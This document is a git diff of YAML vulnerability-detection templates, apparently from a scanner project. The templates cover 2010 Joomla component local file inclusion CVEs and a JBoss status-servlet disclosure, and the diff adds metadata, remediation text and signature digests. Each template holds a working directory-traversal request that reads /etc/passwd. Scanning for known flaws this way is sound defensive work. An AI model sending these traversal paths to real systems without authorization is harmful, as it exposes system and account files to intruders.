+ cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wowjoomla + product: com_loginbox + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/30 +# digest: 4a0a00473045022019a6216a17aa46b463344db67611da4a018991db32794367e30170fda4c032d5022100fee05d56fadf7730ae13dcc8c24e28d2b65d732e2551966484f17d1a0c59b8a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 433c7f2dc2..8b4036048e 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1354 info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12102 - https://nvd.nist.gov/vuln/detail/CVE-2010-1354 - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt - - http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/ - remediation: Upgrade to a supported version. + - http://www.exploit-db.com/exploits/12102 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1354 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_vjdeo + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 490a00463044022071e5c6089d7a3265656928d4b0844e7ac30e0c8858f384969e8ea28445e9a1a802201afbcf554b1791a2d1682068b06013d1aff32dd2a44d16d76f2406f622e632f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index ffd45a5ff0..2330ac43a6 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -6,19 +6,28 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + remediation: | + Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: - https://rhn.redhat.com/errata/RHSA-2010-0377.html - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + - http://marc.info/?l=bugtraq&m=132698550418872&w=2 + - http://securitytracker.com/id?1023918 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1429 - cwe-id: CWE-200 + cwe-id: CWE-264 + epss-score: 0.00573 + epss-percentile: 0.75451 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"JBoss" verified: true + max-request: 1 + vendor: redhat + product: jboss_enterprise_application_platform + shodan-query: title:"JBoss" tags: cve,cve2010,jboss,eap,tomcat,exposure http: @@ -39,4 +48,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/30 +# digest: 4a0a00473045022100f0785cdf3cf9ac8bcc08aeb27651d5ebc65a47874dc38cab7652bb3faf99887902207bb66b5147d1eef1f7cd71583b7571f3548ccb78a45bdfec32fc4d27423f8aed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 2935deea59..f39af5e806 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1461 info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12232 - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504 - http://www.exploit-db.com/exploits/12232 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2010,joomla,lfi,photo,edb + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gogoritas + product: com_photobattle + tags: cve,cve2010,joomla,lfi,photo,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 490a004630440220512fa89c782f5d514471c6a2764e15c8021feb28a171b395f7c098e7e8847512022001f0986d58ecac7f2ade0147f9c74522fe355d8c97c0b9c99715a94c6df7afc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index cc70d52559..51e623dbba 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1469 info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12146 - https://nvd.nist.gov/vuln/detail/CVE-2010-1469 - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt - http://www.exploit-db.com/exploits/12146 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2010-1469 cwe-id: CWE-22 - cvss-score: 6.8 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00813 + epss-percentile: 0.79883 + cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_jprojectmanager + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100c409a1a4b3664fa1717cd99fbef8118476ced469e8f462d307a2798f48a367f202200d25bb45028da27f4c870b7e983ec3a12358998db3992b2b37e28815cf1fca72:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 4592a63630..246b8daafb 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12166 - https://nvd.nist.gov/vuln/detail/CVE-2010-1470 - - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ - http://www.exploit-db.com/exploits/12166 - remediation: Upgrade to a supported version. + - http://www.vupen.com/english/advisories/2010/0858 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1470 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.04616 + epss-percentile: 0.91621 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_webtv + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 490a00463044022030bcc6e2265b88da4638695718ef75896f2f7f9b71945d4a36e8202e42a25c37022030daaa6070318c16740e9a3aed94e0141d313fec8e72a4da9e6a00018ba2dcfd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 86d32fc94c..cb7cfcd00a 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12170 - https://nvd.nist.gov/vuln/detail/CVE-2010-1471 @@ -14,20 +16,28 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1471 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.05684 + epss-percentile: 0.92475 + cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: b-elektro + product: com_addressbook + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100b8e943384062b76428241ada8221979775f9458360453a98d677a4b3d77840e6022030feb2bb1202cf392258a024f4eb82eef009b40edaa1761607dd5ea26be3fefc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index b9eaa3f4cb..fd35095eff 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12167 - https://nvd.nist.gov/vuln/detail/CVE-2010-1472 - - http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/ - http://www.exploit-db.com/exploits/12167 - remediation: Upgrade to a supported version. + - http://www.vupen.com/english/advisories/2010/0859 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1472 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.05684 + epss-percentile: 0.92475 + cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kazulah + product: com_horoscope + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100969b7b1d3f0dd9c028a0d26950ac63a16e03ba2dc5c1a069d334f6ff10c1a9330221009bf556e59f682b306868e1a25e645bb82ffb38101460896ac55f5146c78c0800:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 9ac80976a7..b4b6382e61 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -3,33 +3,40 @@ id: CVE-2010-1473 info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12171 - https://nvd.nist.gov/vuln/detail/CVE-2010-1473 - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt - - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1473 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: johnmccollum + product: com_advertising + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100a263e1457accd2f7765b20d00522e79982e71f5d5fefe7afa02671089cf22e1f022002eb86a8c0a35ce523431b9407f901a28a2430b3a59529265cabff17bf3110c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 476c697cd8..d81e23c75a 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1474 info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12182 - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - - http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/ - http://www.exploit-db.com/exploits/12182 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1474 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: supachai_teasakul + product: com_sweetykeeper + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/30 +# digest: 490a00463044022071e3e8ccbda9b98d1ae2890db2217eb9bcff7d1fdb94d6d449b0fcf0a2a697e1022028caea293cf7775926f7d99d97fa37f8a348dfadd6ec48cb23db70252753fc5e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index b0fdf7431b..49d3e30584 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -3,33 +3,42 @@ id: CVE-2010-1475 info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12147 - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - - http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/ - http://www.exploit-db.com/exploits/12147 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1475 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_preventive + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/03/24 +# digest: 490a0046304402200f59c86b05b26b440da6888f90922f8d767b844409e8266c997a7ce0d28ba135022010443363756cd893173854f4bbed2b4fc2d5c2221fdb3ae2ff1f30c7a9172948:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 772fd73703..f6beda8f51 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1476 info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12150 - https://nvd.nist.gov/vuln/detail/CVE-2010-1476 - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt - http://www.alphaplug.com/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1476 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.03527 + epss-percentile: 0.9051 + cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: alphaplug + product: com_alphauserpoints + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100cdc2e39e4390d1a9ffb156ea63ccbda5696c36e763ff399c49f9e85dddaad829022100d21e28991afdfd5839a7d8ee87a9eb23a435e6243ed2d19eae779cbf01ccfc9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index d8f796dbb7..ab285f1436 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -3,34 +3,39 @@ id: CVE-2010-1478 info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12145 - https://nvd.nist.gov/vuln/detail/CVE-2010-1478 - - http://web.archive.org/web/20140723205157/http://secunia.com/advisories/39262/ - - http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1478 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_jfeedback + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 +# digest: 4a0a00473045022005f48408c11309f5e1c553d795eebe9cae5cf90798eb1581f6d1f7d07bfb3cd90221008ba34f63ed442a058320af5ae0f6f03a91ea61ace0b48a68ab7a9b141c956a14:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 850b15eccd..3f5764d50e 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -3,33 +3,41 @@ id: CVE-2010-1491 info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12318 - https://nvd.nist.gov/vuln/detail/CVE-2010-1491 - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - - http://web.archive.org/web/20140724060325/http://secunia.com/advisories/39533/ - remediation: Upgrade to a supported version. + - http://www.exploit-db.com/exploits/12318 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1491 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mms.pipp + product: com_mmsblog + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a00473045022100e825d1d94d17cda9f7ae1be245a8bc53521461c554ed8c12a958853080948087022015e72623a627e849fe79f6ec026b7d81a3b6a34aa5051016a52167f18630e407:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 07805d0565..e99f69690d 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -3,32 +3,42 @@ id: CVE-2010-1494 info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12113 - https://nvd.nist.gov/vuln/detail/CVE-2010-1494 - http://www.exploit-db.com/exploits/12113 - remediation: Upgrade to a supported version. + - http://www.awdwall.com/index.php/awdwall-updates-logs- + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57693 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1494 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.02305 + epss-percentile: 0.88486 + cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: awdsolution + product: com_awdwall + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4b0a00483046022100a3467a9574504b23f2dbe4521b999c9aea7a8d13a489d6cc88202ef98f8f5458022100ba52c584f05e3dc1ecb10901d9a1153994c91effaa7fa730db910af97c3e13c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 522fa417f8..2fa3fc0d7c 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -5,31 +5,39 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12286 - https://nvd.nist.gov/vuln/detail/CVE-2010-1495 - http://www.vupen.com/english/advisories/2010/0929 - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1495 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.04503 + epss-percentile: 0.91527 + cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: matamko + product: com_matamko + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 4a0a004730450220272df8ec3f14ce6291d8451f3211b9383aa379d6f0cfaab5b8da1045bf23b9f9022100ac30d6b384061ba0b3761869ec4e549ffbedae7a9476a970b90c2c265dde8625:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 6695b609cf..6db80715ed 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -5,30 +5,40 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12054 - https://nvd.nist.gov/vuln/detail/CVE-2010-1531 - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt - remediation: Upgrade to a supported version. + - http://redcomponent.com/redshop/redshop-changelog + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57512 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1531 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.01815 + epss-percentile: 0.86836 + cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redcomponent + product: com_redshop + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + +# digest: 